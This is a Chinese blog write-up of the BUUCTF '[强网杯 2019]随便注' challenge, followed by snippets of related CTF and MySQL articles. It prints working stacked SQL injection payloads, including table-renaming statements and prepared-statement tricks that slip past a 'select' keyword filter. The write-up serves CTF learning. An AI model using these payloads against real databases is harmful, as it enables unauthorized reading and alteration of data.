[强网杯 2019]随便注

最新推荐文章于 2025-12-22 09:37:19 发布
原创 最新推荐文章于 2025-12-22 09:37:19 发布 · 118 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #sql

本文介绍了MySQL数据库的SQL注入漏洞利用方法,包括爆库、爆表、爆字段名及修改表名和列属性的语法。同时,展示了三种预处理SQL语句的执行方式,并提供了相关参考资料,旨在揭示SQL注入的危害,提醒读者关注数据库安全。

BUUCTF刷题记录

[强网杯 2019]随便注

在这里插入图片描述

爆库
1’;show databases;#
在这里插入图片描述
爆表
1’;show tables;#
在这里插入图片描述
爆字段名
1’;show columns from 1919810931114514;#
在这里插入图片描述
修改表名的语法:alter table rename to/as new_tablename;
修改列的属性:table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL

貌似得一次性来??分开不行

0';rename table words to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

贴一个预处理的方法

第一种
PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL        语句
第二种
SET @tn = 'hahaha';  //存储表名
SET @sql = concat('select * from ', @tn);  //存储SQL语句
PREPARE name from @sql;   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

解3种食用方式

1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#


1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

参考:

https://www.cnblogs.com/wjw-zm/p/12359735.html

攻防世界-supersqli题
weixin_46784800的博客
11-19 1133
随便 handler执行 handler基本语法: handler table_1_name open 打开一个名为table_1_name的表的句柄 handler table_1_name read first 阅读表table_1_name 的第一行 题目分析 发现过滤了select|update|delete|drop|insert|where|. 这些字符,发现过滤了select之后就不能用select进行查询了 首先尝试堆叠入: 发现了两个表,一个是words,一个是19198
【BUUCTF】强网 2019随便1 write up
GZWZ_的博客
04-06 5040
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
MySQL学习 预处理语句prepare
baynk的博客
04-01 715
一直认为预处理语句结合PHP中PDO是可以用来有效防止SQL入的,直到在writeup中看到有用预处理语句来绕过限制完成入的,脑洞大开! 0x01 预处理语句 MySQL语法常用三个语句: PREPARE stmt_name FROM preparable_stmt; //预备语句 EXECUTE stmt_name [USING @var_name [, @var_name] ...
一天一道CTF 第三天(堆叠入改表名)
scrawman的博客
03-02 512
[强网 2019]随便 今天的也是SQL入,输入1'报错显示说明闭合符号是' 再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。 在网上查了一下可以用堆叠入,1';show databa
SQL入的一般方法总结(含WAF绕过) ctf
NLost
03-20 7549
Sql 入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL入常见绕过方法:以下以 **index.php?id=1** 为例绕过
强网 2019]随便SQL入】四种解法
weixin_38832257的博客
08-17 2579
题目简介 题目名称:[强网 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
强网2019 随便
2401_83972784的博客
11-21 433
看见flag直接出现了,怎么查询呢,没思路了,看了wp,学到一个骚操作,猜测这里输入1后返回的是words表里面的数据。看见select被过滤了,那应该后面查询时候又要用拼接之类的查询方式了,先试试堆叠入可不可用。可知列数为二,就在我以为这么简单的时候,union select输入就出来了被过滤的语句。sqlmap是没有灵魂的,手工入呗,先看看随便输入一个值页面有什么反应。就可以达到,将words表修改成words1,将拎一个表修改成words。堆叠入可用,继续查询表名。正常手工入,先求个闭合。
buuctf[强网2019随便]
2403_89727669的博客
04-09 369
但是他的数据类型为int,而data与flag的类型均为varchar,所以我们在这里获得思路,可以将。发现words里面有两个字段,另一个只有一个字段,所以后台的查询语句应为。中新添加id字段,然后words的名字改为任意的,输入有关select的命令发现。
【BUUCTF】web之强网2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
强网2019随便!!sqllibs 第11和12关 postsqlmap直接嗦??堆叠入来看看!!!!
helloKittywz的博客
06-08 926
看到了数据库我们在看表,还是一样的加参数 -tables。前面都是get型的入,我们现在来看看post的sql入。我在经过简单的尝试过后,也成功的登录了,看看我下面的。sqlamp中加上参数-r “路径”来进行入。的,看能不能来进行登录,这点就需要我们来进行。post的sql入的话,我们在看见了。,这点跟get入不一样。相结合来进行操作,然后把。放到一个记事本中,然后在。post的话我们要跟。
BUUCTF -web- [强网 2019]随便
qq_44640313的博客
12-14 3222
以buuctf的强网2019为例的堆叠
UNCTF2020 wp
l11III1111的博客
11-15 2189
WEB easy_ssrf 进到页面显示源代码,过滤了一些协议。可以用取反绕过伪协议的限制。 #构造paylaod echo urlencode(~('file:///')).'unctf.com/../../../../../../flag'; #%99%96%93%9A%C5%D0%D0%D0unctf.com/../../../../../../flag easyunserialize __wakeup()函数里判断password是否等于easy,是的话输出flag。 但是password我
得到PrepareStatement最终执行的sql语句的方法
热门推荐
06-02 1万+
得到PrepareStatement最终执行的sql语句的方法   在优快云的JAVA基础版,常常有人问及如何得到PreparedStatement最终执行的SQL语句;或者如何在控制台输出占位符的真实值..... 原因就是PreparedStatement执行的sql语句有大量的占位符?.... 问题诸如JDBC中: 如何得到 conn.prepareSta
[强网 2019]随便 1(SQL堆叠入+修改数据库+预处理语句+concat拼接)
Home to come
08-17 1059
本文属于个人刷题记录,不会完全描述步骤,而是写自己感触深的知识点。 1.堆叠入原理(stacked injection)   在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。 1.1与union查询区别   而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠
MySQL 无缝迁移到达梦:前置方法与全面评估分析指南
数记
12-20 1061
MySQL迁移至达梦数据库(DM)的兼容性评估与迁移策略摘要 本文系统分析了从MySQL迁移到达梦数据库的关键步骤: 兼容性评估:检查表结构、SQL语法、存储过程等对象的兼容性,对比事务隔离、字符集等特性差异,使用达梦工具(如DTS、SQL Checker)辅助分析。 工作量分级:根据适配难度分为低(直接兼容)、中(语法调整)、高(代码重写)和阻断项(需业务改造),示例评估显示存储过程改造占比最高(40%)。 迁移实施:分阶段进行试点验证、灰度同步(dmdrs工具)和全量切换,结合达梦DTS工具自动转换,配
基于 MySQL Monitoring and Management 的性能保障实践
星哥玩云
12-17 974
摘要:本文探讨MySQL Monitoring and Management(MMM)工具在数据库性能保障中的实践应用。MMM作为官方推荐的轻量化监控方案,具有全栈指标覆盖、易部署和可视化告警等优势。重点分析了查询执行时间、连接数和缓存命中三大核心指标的监控逻辑与优化策略,并提供了从部署到日常监控的完整操作流程。通过电商平台案例展示了MMM在实际场景中的故障定位与性能优化价值,最后提出指标联动、动态阈值调整等优化建议,为构建高效的MySQL监控体系提供实用指南。
海外开发者实践分享:用 MoonBit 开发 SQLC 插件(其二)
m0_74743788的博客
12-18 852
第一篇的链接:https://zenn.dev/4245ryomt/articles/9680434dc60c0c本文中使用的moon。
Canal深度解析:MySQL增量数据订阅与消费实战
qq_41262225的博客
12-18 828
Canal实战指南:MySQL增量数据同步利器 Canal是阿里巴巴开源的MySQL增量数据订阅组件,基于MySQL主从复制协议实现毫秒级数据同步。核心原理是伪装成MySQL从库,通过解析binlog获取数据变更,支持Row格式的binlog解析。典型应用场景包括缓存同步、实时数据分析、数据异构迁移等。 Canal架构包含三个核心组件:EventParser负责连接MySQL并解析binlog;EventSink进行数据过滤和路由;EventStore存储事件数据。部署时需配置MySQL开启binlog并设
MySQL 数据类型全面详解(含案例+总结)
最新发布
qq_59093178的博客
12-22 648
MySQL 数据类型全面详解(含案例+总结)
buuctf-强网2019随便
09-03
buuctf-强网2019随便是一场2019强网举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值